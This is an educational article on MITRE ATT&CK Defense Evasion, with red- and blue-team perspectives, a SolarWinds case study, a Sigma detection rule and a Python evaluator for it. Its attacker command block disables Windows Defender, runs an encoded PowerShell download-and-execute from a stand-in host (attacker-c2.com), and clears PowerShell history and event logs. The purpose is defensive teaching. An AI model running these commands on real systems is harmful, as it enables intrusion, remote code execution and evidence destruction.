Defense Evasion (TA0005)
The Attacker's Critical Art of Stealth & How to Stop It
Introduction: The "So What?" Hook
Defense Evasion is the attacker's systematic effort to avoid detection by security tools and personnel after breaching a network. It's not just about getting in; it's about staying in, unseen, for as long as possible.
Why does this matter? In the cyber kill chain, successful Defense Evasion is what transforms a brief, noisy intrusion into a persistent, devastating breach. If an attacker can't evade, they get caught quickly. But if they master this tactic, they can move laterally, steal data for months, and embed deeply into your infrastructure. For defenders, failure at this stage means playing a futile game of whack-a-mole while the real threat operates with impunity right under your nose.
The Core Analogy: The Digital Chameleon
Imagine a master thief has broken into a high-security museum. Getting past the outer fence was Initial Access. Now, inside the grounds, their real work begins: becoming invisible.
They don't just run through laser grids. They disable motion sensors (security software), wear a guard's uniform (process masquerading), hide in blind spots (log-free areas), and move only when patrols look away (timing-based execution). They erase their footprints, mimic legitimate staff behavior, and even temporarily break cameras pointing at their target room. Their goal isn't just to steal the painting; it's to make security think nothing was stolen until weeks later.
This is Defense Evasion. Your network is the museum. Your EDR, SIEM, and firewall logs are the sensors and cameras. The attacker's entire mission is to manipulate, disable, or trick these systems into reporting "all clear" while the theft happens in plain sight.
Vocabulary Decoder Ring
- Obfuscation: The art of making code or data difficult to understand or analyze. Why it matters here: Attackers obfuscate malicious scripts to bypass signature-based antivirus and hide their intent from analysts.
- Indicator Removal: Deleting or altering evidence of compromise from logs, filesystems, or memory. Why it matters here: This is the "cleaning up" phase of Defense Evasion, making forensic investigation and incident response exponentially harder.
- Living Off the Land (LOLBins): Using legitimate, pre-installed system tools (like PowerShell, Windows Management Instrumentation) for malicious purposes. Why it matters here: These tools are trusted by the system and often poorly monitored, providing perfect camouflage for malicious activity.
- Rootkit: Malware designed to hide the existence of other programs or processes, often operating at the kernel level. Why it matters here: The ultimate form of Defense Evasion, making malicious processes invisible even to the operating system itself.
- Signature-based Detection: Security tools that identify threats by matching patterns (signatures) against known malicious code. Why it matters here: Much of Defense Evasion is specifically designed to break these signatures through packing, encoding, or polymorphism.
The Attacker's Playbook (Red Team View)
The Chameleon's Mindset
From the attacker's chair, Defense Evasion is a continuous, adaptive process. Every action is weighed against its "noise" level. The goal isn't just to achieve an objective, but to do so while generating the minimum possible security alerting. It's a game of psychology: understanding what the blue team monitors, what they ignore, and how they investigate.
Common Defense Evasion Techniques
- T1027 - Obfuscated Files or Information: Encoding, packing, or encrypting payloads to avoid signature detection.
- T1070 - Indicator Removal: Clearing Windows event logs, deleting files, or tampering with prefetch files to erase tracks.
- T1036 - Masquerading: Giving malicious files names and metadata of legitimate system files (e.g., naming malware "svchost.exe" but placing it in a user directory).
- T1112 - Modify Registry: Altering registry keys to disable security features, persist malware, or hide configurations.
- T1562 - Impair Defenses: Directly disabling security software like antivirus, EDR agents, or logging services.
The Evader's Toolbox
- Cobalt Strike: malleable C2 profiles that mimic normal traffic.
- Mimikatz: techniques to bypass AMSI and execute in memory.
- Living-off-the-land binaries such as PowerShell, BITSAdmin, and certutil: built-in tools that fly under the radar.
Command-Line Glimpse: The Attacker's Terminal
# Example: Defense Evasion via Living-off-the-land and Log Manipulation
# 1. Disable Windows Defender Real-time Monitoring (Requires Admin)
Set-MpPreference -DisableRealtimeMonitoring $true
# 2. Execute payload encoded to avoid command-line detection (AMSI Bypass)
powershell -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AHQAYQBjAGsAZQByAC0AYwAyAC4AYwBvAG0ALwBzAGMAcgBpAHAAdAAnACkA
# 3. Clear the PowerShell command history (Indicator Removal)
Remove-Item (Get-PSReadlineOption).HistorySavePath -ErrorAction SilentlyContinue
# 4. Clear specific Event Logs to remove evidence
wevtutil cl "Windows PowerShell"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"
The Defender's Handbook (Blue Team View)
The Museum Security Director's Mindset
Your job is to notice when something doesn't fit the pattern. The "guard" walking slightly off-route. The "maintenance" happening at 3 AM. The camera that briefly flickered. In digital terms, you're looking for anomalies, not just signatures. You must assume the attacker is already inside and trying to hide. Your security tools are your sensors, but they can be tricked, so you need to look for the signs of the trick itself.
SOC Reality Check: What You Actually See
Here are representative log entries that scream Defense Evasion:
Event ID 4688: A process was created.
Process Name: C:\Windows\System32\WindowsPowerShell\v1[.]0\powershell[.]exe
Command Line: powershell -Exec Bypass -Enc JABzAGIAIAA9ACAACgA... [Very long encoded string]
Parent Process: C:\Users\Public\Downloads\pdf_reader[.]exe
Event ID 1102: The audit log was cleared.
Subject Security ID: DOMAIN\ServiceAccount
Why this is suspicious: Legitimate PowerShell use rarely needs execution policy bypass with long encoded commands. A "service account" clearing audit logs is highly unusual. Together, they paint a clear picture of evasion.
Threat Hunter's Eye: Proactive Hypothesis
Hunt Hypothesis: "Look for processes that spawn from unexpected locations (like user temp folders) but are named after legitimate system executables (svchost.exe, lsass.exe, csrss.exe). This is T1036 Masquerading. Correlate with network connections to newly seen or known-bad IPs."
Defensive Tools & Categories
- Endpoint Detection & Response (EDR): CrowdStrike, Microsoft Defender for Endpoint, SentinelOne. These look at behavior, not just signatures.
- Security Information & Event Management (SIEM): Splunk, Azure Sentinel, QRadar. For correlating logs across systems to spot evasion patterns.
- Process Monitoring & Application Control: Tools that baseline normal behavior and alert on deviations, like Sysmon with a strong configuration.
Blue Team Command: Your Investigative Lens
# Sigma Rule Snippet for detecting suspicious event log clearing
title: Suspicious Audit Policy Change or Log Clear
description: Detects attempts to modify audit policies or clear logs, common in Defense Evasion
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID:            # a list is OR'd: either event ID matches
            - 1102          # The audit log was cleared
            - 4719          # System audit policy was changed
    filter:
        SubjectUserName: 'SYSTEM'   # Legitimate clears by SYSTEM are common
    condition: selection and not filter
falsepositives:
    - Legitimate administrative activity (though non-SYSTEM account clearing logs should be rare)
level: high
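As an added example, not part of the original article, the following Python applies the rule's logic to constructed Security events using Sigma's matching semantics: fields within a selection are ANDed, a list of values for one field is ORed, and string comparison is case-insensitive. The event field names and values are constructed.

```python
# Added example (not from the original article): a minimal evaluator for the
# Sigma rule above, run against constructed Windows Security events.
RULE = {
    "selection": {"EventID": [1102, 4719]},   # list value: either event ID matches
    "filter": {"SubjectUserName": "SYSTEM"},  # the rule's own exclusion
}

def _norm(value) -> str:
    # Sigma compares strings case-insensitively; numbers and strings are
    # normalized the same way so EventID 1102 and "1102" both match.
    return str(value).lower()

def matches(search: dict, event: dict) -> bool:
    """A search block matches when every field matches (AND); a list of
    values for one field means any of them may match (OR)."""
    for field, wanted in search.items():
        if field not in event:
            return False
        options = wanted if isinstance(wanted, list) else [wanted]
        if _norm(event[field]) not in {_norm(o) for o in options}:
            return False
    return True

def sigma_condition(event: dict) -> bool:
    """condition: selection and not filter"""
    return matches(RULE["selection"], event) and not matches(RULE["filter"], event)

def alerts(events):
    return [e for e in events if sigma_condition(e)]

# Constructed sample events; field names follow the Windows Security log.
SAMPLE_EVENTS = [
    {"EventID": 1102, "SubjectUserName": "SYSTEM", "Computer": "WS01"},
    {"EventID": 1102, "SubjectUserName": "ServiceAccount", "Computer": "WS01"},
    {"EventID": 4719, "SubjectUserName": "jdoe", "Computer": "DC01"},
    {"EventID": 4688, "SubjectUserName": "jdoe", "Computer": "WS01"},
]

if __name__ == "__main__":
    for e in alerts(SAMPLE_EVENTS):
        print(f"ALERT {e['Computer']}: EventID {e['EventID']} by {e['SubjectUserName']}")
```

Note that a 1102 event with no SubjectUserName field is not excluded by the filter and therefore still alerts, which is the safer failure mode for this rule.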
Real-World Example: From Headlines to Logs
The SolarWinds SUNBURST Attack
The 2020 SolarWinds compromise was a masterclass in sophisticated Defense Evasion. The threat group (known as NOBELIUM or APT29) didn't just breach SolarWinds; they engineered their malware to be nearly invisible for months.
Explicit Connection: In the SolarWinds attack, the threat group used Defense Evasion when they designed the SUNBURST backdoor to remain dormant for up to two weeks, carefully checking for security tools, virtualization environments, and analysis processes before activating. This allowed them to bypass automated sandbox analysis and avoid triggering behavioral alerts, giving them time to move laterally to high-value targets like government agencies and Fortune 500 companies.
The malware used legitimate SolarWinds digital certificates for signing (making it appear trusted), communicated via normal HTTPS to blend with web traffic, and its command-and-control domain names were crafted to mimic legitimate SolarWinds subdomains. This multi-layered evasion made detection exceptionally difficult until manual threat hunters noticed anomalous network traffic patterns months later.
Mapping the MITRE ATT&CK Defense Evasion Landscape
Below are some of the most prevalent Defense Evasion techniques. Remember that each technique has numerous sub-techniques; these are the high-level categories that form the attacker's evasion playbook.
| Technique ID | Name | Brief Purpose |
| --- | --- | --- |
| T1562 | Impair Defenses | Disable or modify security tools like antivirus, EDR, and logging services. |
| T1070 | Indicator Removal | Delete or alter forensic evidence in logs, filesystems, and network artifacts. |
| T1027 | Obfuscated Files or Information | Encode, encrypt, or pack malicious code to avoid signature detection. |
| T1036 | Masquerading | Disguise malicious items as legitimate files, paths, or naming conventions. |
| T1112 | Modify Registry | Change registry keys to hide persistence, configurations, or disable security. |
| T1548 | Abuse Elevation Control Mechanism | Bypass User Account Control (UAC) or exploit privileges to run with higher rights. |
| T1222 | File and Directory Permissions Modification | Change permissions to protect malicious files or access restricted areas. |
Key Takeaways & Immediate Actions
For Everyone (The 30-Second Summary)
- Defense Evasion is what happens AFTER the initial breach. It's the attacker working to stay hidden, not just get inside.
- This tactic turns a brief compromise into a long-term, damaging breach. If they evade well, you might not know you're owned for months.
For Leadership (Business Risk Translation)
- Successful Defense Evasion enables attackers to operate undetected, leading to massive data exfiltration, ransomware deployment across the entire network, and catastrophic operational disruption. The longer they hide, the higher the recovery cost and reputational damage.
For Defenders (Actionable Steps)
1. Enable and Centralize Comprehensive Logging: Ensure PowerShell, Windows Security, Sysmon, and firewall logs are collected. You can't detect log clearing if you're not logging the clear event.
2. Implement Behavioral Detection: Move beyond signature-based tools. Deploy EDR and create alerts for unusual parent-child process relationships (e.g., Word spawning PowerShell).
3. Hunt Proactively: Regularly search for signs of evasion: encoded command lines, disabled security services, event log clears from non-system accounts, and LOLBin usage outside normal patterns.
4. Harden Endpoints: Apply the principle of least privilege, constrain PowerShell with Constrained Language Mode, and use application allowlisting where feasible.
Further Learning & References
Dive deeper into Defense Evasion with these essential resources: